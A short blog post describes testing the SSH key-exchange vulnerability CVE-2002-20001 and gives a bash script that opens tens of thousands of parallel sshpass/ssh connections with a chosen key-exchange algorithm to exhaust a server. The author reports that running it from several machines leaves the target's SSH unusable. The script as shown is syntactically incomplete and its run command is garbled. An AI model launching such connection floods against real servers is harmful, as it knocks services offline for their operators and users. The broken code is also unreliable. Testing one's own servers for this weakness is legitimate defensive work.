ssh Vulnerability DoS test

By | May 30, 2023

This test was created when I worked with CVE-2002-20001 vulnerability. The vulnerability is about diffie-hellman-group-exchange-sha256 key exchange algorithm with high computational complexity which is using long exponents that arguably make certain calculations unnecessarily expensive. To test the issue I created small bash script to simulate DDoS attack on ssh server using different key exchange algorithm. The script code is:

#! /bin/bash
if [ $# -ne 2 ]; then
        echo "No arguments: server ID/FQDN and kex algorithm"
for i in {0..70000}
        sshpass -p 12345 ssh -o KexAlgorithms=$2 admin@$1 &

To run the script you need to install sshpash, for CentOS:

yum install sshpass

Then I started with diffie-hellman-group-exchange-sha256 key exchange algorithm:

./ diffie-hellman-group-exchange-sha256

Attempt to do login via ssh to the same server shows me this:

# ssh root@
ssh_exchange_identification: Connection closed by remote host

However attempts with other Kex algorithms do not show significant differences sometime login was denied as well. However when I ran script from different computers in other works doing DDoS attack instead of DoS the ssh server on target machine falls in unusable state always.

Leave a Reply

Your email address will not be published. Required fields are marked *